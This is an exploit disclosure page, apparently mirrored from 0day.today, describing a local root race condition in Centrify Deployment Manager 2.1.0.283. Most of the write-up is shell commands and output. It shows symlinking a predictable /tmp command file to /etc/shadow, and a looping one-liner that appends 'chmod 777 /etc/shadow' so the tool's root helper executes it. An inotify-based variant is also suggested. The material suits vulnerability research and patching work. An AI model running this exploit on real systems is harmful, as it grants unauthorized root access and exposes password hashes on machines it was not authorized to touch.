Lucene search
K

Centrify Deployment Manager 2.1.0.283 Local Root Vulnerability

🗓️ 08 Dec 2012 00:00:00Reported by Larry CashdollarType 
zdt
 zdt
🔗 0day.today👁 28 Views

Centrify Deployment Manager v2.1.0.283 local root vulnerability discovered on 12/7/2012, enables unauthorized access to /etc/shadow fil

Code
Centrify Deployment Manager v2.1.0.283 local root
12/7/2012

Taking a little longer look at the software, I managed to win a race condition and get root with files in /tmp. Here is my analysis:

[email protected]:/tmp ls -l /etc/shadow
-r-------- 1 root shadow 1010 Dec 7 21:42 /etc/shadow [email protected]:/tmp

[email protected]:/tmp$ ln -s /etc/shadow centrify.cmd.0 [email protected]:/tmp$ ls -l
total 24
lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -> /etc/shadow After Analyze/Refresh Computer Information is run :

[email protected]:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow [email protected]:/tmp cat /etc/shadow
echo 144d823c-9c22-4d21-8446-4e2d07556177 vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null temp=$?
echo af43ab93-cfce-485e-b16f-0d4331e0e421 exit ${temp}
[email protected]:/tmp ls -l /etc/shadow
-rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow [email protected]:/tmp

This sucks we clobber the contents of /etc/shadow and we don't have write permission.

No root still.

Looking at the history and trace of what was run on the target system we see this:

Execute echo "echo 8c8ac888-342b-461f-a0ab-659251f3d602" > /tmp/centrify.cmd.0 Result =0 <----- if we create the file before them, we own it.  We can write to it before it's executed and have our command executed.

Execute echo "vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null" >> /tmp/centrify.cmd.0 Result =0
Execute echo "temp=\$?" >> /tmp/centrify.cmd.0 Result =0
Execute echo "echo b2449bef-65c1-45e8-9da0-4801200c5c05" >> /tmp/centrify.cmd.0 Result =0
Execute echo "exit \${temp}" >> /tmp/centrify.cmd.0 Result =0
Execute chmod 755 /tmp/centrify.cmd.0 Result =0 
Execute dzdo -p "Password:" sh -c "/tmp/centrify.cmd.0" Result =0 <--- dzdo is centrify's sudo equivalent, it's part of the centrify suite.
8c8ac888-342b-461f-a0ab-659251f3d602
b2449bef-65c1-45e8-9da0-4801200c5c05
Execute rm -rf /tmp/centrify.cmd.0 Result =0
Execute id -u Result =0

So our quick dirty exploit:

[email protected]:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0 ; done

Will get us our command executed:

[email protected]:/tmp$ ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow [email protected]:/tmp$

It might work creating the file centrify.cmd.UID, then monitoring it for having the execute bit set with inotify (IN_ATTRIB). When the execute bit is set write our malicious command to the file as it about to be executed by root.

Hopefully Kayne won't smash my fingers with a hammer.  ;-)

Larry W. Cashdollar
http://vapid.dhs.org
@_larry0

#  0day.today [2018-02-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation